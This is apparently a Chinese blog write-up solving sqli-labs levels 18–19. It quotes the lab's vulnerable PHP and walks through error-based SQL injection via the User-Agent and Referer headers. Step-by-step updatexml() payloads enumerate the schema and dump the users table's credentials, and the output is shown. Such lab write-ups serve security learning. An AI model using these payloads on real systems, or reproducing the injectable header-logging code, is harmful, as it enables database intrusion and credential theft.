2. 程式人生 > 實用技巧 >sqli-labs 18-19 --Header_injection

sqli-labs 18-19 --Header_injection

阿新 發佈:2020-07-22

sqli-labs 18

知識點

頭部注入

報錯注入

使用的函式:

updatexml (XML_document, XPath_string, new_value);
第一個引數:XML_document是String格式,為XML文件物件的名稱
第二個引數:XPath_string (Xpath格式的字串)
第三個引數:new_value,String格式,替換查詢到的符合條件的資料
作用:改變文件中符合條件的節點的值
報錯注入原理:當XPath_string()不滿足格式的時候,會報錯並把查詢資訊放到報錯資訊裡
通常用 ’ ~ ’製造語法錯誤,編碼後為0x7e

報錯注入的語句:
updatexml(1,concat(0x7e,(常用sql注入語句),0x7e),1))

原始碼

//這裡是過濾
function check_input($value)
	{
	if(!empty($value))
		{
		$value = substr($value,0,20); // truncation (see comments)
		}
		if (get_magic_quotes_gpc())  //返回當前 magic_quotes_gpc 配置選項的設定  Stripslashes if magic quotes enabled
			{
			$value = stripslashes($value);//stripslashes() 函式刪除由 addslashes() 函式新增的反斜槓。
			}
		if (!ctype_digit($value))   	//用處:檢查提供的 string 和 text 裡面的字元是不是都是數字。語法:ctype_digit ( string $text ) : bool; 
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			//mysql_real_escape_string() 函式轉義 SQL 語句中使用的字串中的特殊字元。下列字元受影響:\x00,\n,\r,\,',",\x1a
			//如果成功,則該函式返回被轉義的字串。如果失敗,則返回 false。
			}
	else
		{
		$value = intval($value);//intval() 函式通過使用指定的進位制 base 轉換(預設是十進位制)
		}
	return $value;
	}
//注意這裡有對頭部的處理
	$uagent = $_SERVER['HTTP_USER_AGENT'];
	$IP = $_SERVER['REMOTE_ADDR'];
	echo "<br>";
	echo 'Your IP ADDRESS is: ' .$IP;
	echo "<br>";
	//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
//只檢查了輸入的使用者名稱和密碼,沒有檢查頭部
	{
	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);
	/*
	echo 'Your Your User name:'. $uname;
	echo "<br>";
	echo 'Your Password:'. $passwd;
	echo "<br>";
	echo 'Your User Agent String:'. $uagent;
	echo "<br>";
	echo 'Your User Agent String:'. $IP;
	*/
	//logging the connection parameters to a file for analysis.	
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Agent:'.$uname."\n");
	
	fclose($fp);
	
	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)
			{
			echo '<font color= "#FFFF00" font size = 3 >';
			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
//注意這裡把ip,uagent代入資料庫查詢了
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color= "#0000ff" font size = 3 >';			
			echo 'Your User Agent is: ' .$uagent;
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());		//注意這裡輸出了錯誤	
			echo "<br><br>";
			echo '<img src="../images/flag.jpg"  />';
			echo "<br>";
			
			}
		else
			{
			echo '<font color= "#0000ff" font size="3">';
			//echo "Try again looser";
			print_r(mysql_error());
			echo "</br>";			
			echo "</br>";
			echo '<img src="../images/slap.jpg"   />';	
			echo "</font>";  
			}

	}

判斷

無過濾+代入資料庫查詢+輸出錯誤=存在sql注入
查詢結果顯示uagent,ip
可以用報錯注入,注入點可以用uagent
嘗試了用ip做注入點但是沒有結果

構造payload

首先要把原來的語句閉合,根據程式碼

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

我們要構造一個類似的語句,把原來的ip,uname代替掉,用#註釋掉多餘的部分
1','1',updatexml(1,concat(0x7e,(select database()),0x7e),1))#


庫:security
1','1',updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

表:emails,referers,uagents,users

1','1',updatexml(1,concat(0x7e,(select group_concat( column_name ) from information_schema.columns where table_name='users'),0x7e),1))#

users中的欄位:id,username,password,ip,time,US

1','1',updatexml(1,concat(0x7e,(select(group_concat(id,0x3a,username,0x3a,password)) from security.users),0x7e),1))#

值:~1:Dumb:Dumb,2:Angelina:I-kill-y
沒有完全顯示出來,加上substr,一點點讀取
1','1',updatexml(1,concat(0x7e,(select substr((select group_concat(id,0x3a,username,0x3a,password) from security.users),20,50)),0x7e),1))#

ina:I-kill-you,3:Dummy:p@ssword

~d,4:secure:crappy,5:stupid:stup

stupid:stupidity,6:superman:gen

uperman:genious,7:batman:mob!le

tman:mob!le,8:admin:admin~
看到~,說明都讀完了
~1:Dumb:Dumb,2:Angelina:I-kill-you,3:Dummy:p@ssword,4:secure:crappy,5:stupid:stupidity,6:superman:genious,7:batman:mob!le,8:admin:admin~

sqli-labs 19

和18題基本一樣,除了注入點換到了referer,然後payload要減少一個引數,其他都一樣

關鍵原始碼

$uagent = $_SERVER['HTTP_REFERER'];

uagent裡面的值是referer

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

插入語句裡一共有兩個引數

payload:

1',updatexml(1,concat(0x7e,(select database()),0x7e),1))#
1',updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
1',updatexml(1,concat(0x7e,(select group_concat( column_name ) from information_schema.columns where table_name='users'),0x7e),1))#
1',updatexml(1,concat(0x7e,(select(group_concat(id,0x3a,username,0x3a,password)) from security.users),0x7e),1))#
1',updatexml(1,concat(0x7e,(select substr((select group_concat(id,0x3a,username,0x3a,password) from security.users),20,50)),0x7e),1))#

相關推薦

sqli-labs 18-19 --Header_injection

sqli-labs 18 知識點 頭部注入 報錯注入 使用的函式: updatexml (XML_document, XPath_string, new_value);

sqli-labs Less-18/ Less-19 POST-Header Injection

Less-18 POST-Header Injection-Uagent field-Error Based POST方式,頭部 User-Agent: 注入 Less-19 POST-Header Injection-Referer field-Error based POST方式,頭部 Referer: 注入 Less-18 / Less-19

sqli-labs.less13-18過關記錄

Pass13 和之前pass5、6一樣,用單引號和括號閉合 輸入admin\') order by 3#報錯 admin\') order by 2#返回正常

Sqli-Labs Less12:POST注入

開啟bp抓包 傳送至Repeater,新增 \\ 進行測試 根據報錯:222\") 猜測查詢語句: select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

sqli-labs個人注入心得

閉合方式型別都有一般是’,\",或 無閉合符號 或 \'),\") Less-1 嘗試?id=1 註釋符號為–+、-- 、#。

sqli-labs學習sql注入

sqli-labs的安裝和配置 下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0,不然容易出錯,本人就是PHP study版本高了,一直出錯)

sqli labs less 14

進行了一系列的試探,發現輸入雙引號後報錯,通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心,可以在輸入雙引號加括號進行試探。

Laravel6.18.19如何優雅的切換髮件賬戶

前言 在做一個通知系統時,業務需求,根據不同場景使用不同的賬戶傳送郵件,laravel預設只支援一個郵箱發郵件。不滿實際情況,使用Config::set()方法動態設定賬戶後,可以成功傳送郵件,再次set無法再次修改發件賬戶

sqli-labs 20-22 --cookie注入

異常處理 一開始開啟這個題目的時候找不到cookie... 登入成功就是沒有cookie cookie注入沒有cookie...

sqli-labs第十八題

檢視題目 基於錯誤的請求頭注入 一個登入表單,顯示了ip地址。 測試一通毫無頭緒。。。看看原始碼

Sqli-labs 1-10

Less 1-4(基礎注入) 基礎知識: table_schema:資料庫的名稱 table_name:表的名稱 column_name:列的名稱

sqli-labs第七關

1、首先判斷注入點 正常顯示是這樣的不正常顯示是這樣的猜到最後,注入點是字元型,單引號加兩個小括號,?id=1’)) – -因為它只有正常顯示和不正常顯示兩種狀態,並且也沒有MySQL的報錯資訊。正常來說,這

SQLI-LABS靶場環境搭建詳細流程

準備工作 需要虛擬機器一臺: 我用的是Win2008R2企業版 Web容器: phpstudy2016 額外需要安裝VC9_x86 32位 為了配合phpstudy2016版本中版本較低的php環境, 所以需要提前安裝好32位的VC9

sqli-labs 21-37關卡

less 21 “基於’)字元型的Cookie注入” 注入語句: 1’) union select 1,database(),3# 編碼:MScpIHVuaW9uIHNlbGVjdCAxLGRhdGFiYXNlKCksMyM=

sqli-labs通關Less 1-4

sqli-labs通關Less 1-4 實驗工具:phpstudy pro, Firefox MySQL 5.7.26 Nginx 1.15.11 PHP 5.4.45 注意:sqli-labs-master配置正確的情況下,建立實驗資料庫出錯,可能是由於php版本造成,可試著更改其版本

sqli-labs 7_通過“ Galaxy Labs”搶先體驗Galaxy S7的新功能

sqli-labs 7 Trying new things is always fun, especially when it comes to tech. Getting hands and eyes on new features before they become mainstays is even more exciting. Not only that,

sqli-labs第一關:基於錯誤的GET單引號字元型注入

點進去題目:提示我們輸入題目id,第一題,所以我們輸入?id=1,回車即可。如圖:首先可以判斷這裡接受的是一個GET請求,先在1後面加一個’ 發現報錯,說明這裡沒有過濾掉引號,所以這裡是一個注入點 SQL注入

sqli-labs Less7 匯出檔案字元型注入

Less-7 GET - Dump into outfile - String (匯出檔案GET字元型注入) 匯出到檔案就是可以將查詢結果匯出到一個檔案中,如常見的將一句話木馬匯出到一個php檔案中,常用的語句是:select “<?php @eval(

sqli-labs 通關指南:Less 27、28

Less 27 和 Less 28 都涉及到了對 “SELECT” 和 “UNION” 的過濾,根據情況我們可以採用大小寫過濾或者用其他編碼打亂過濾的句式。

sqli-labs 通關指南:Less 29、30、31

Less 29、30、31 都使用了 WAF 進行引數過濾,此處我們需要對 WAF 進行繞過再進行注入。可以使用 HPP 引數汙染攻擊,繞過 WAF 之後的注入過程和 Less 1 一樣。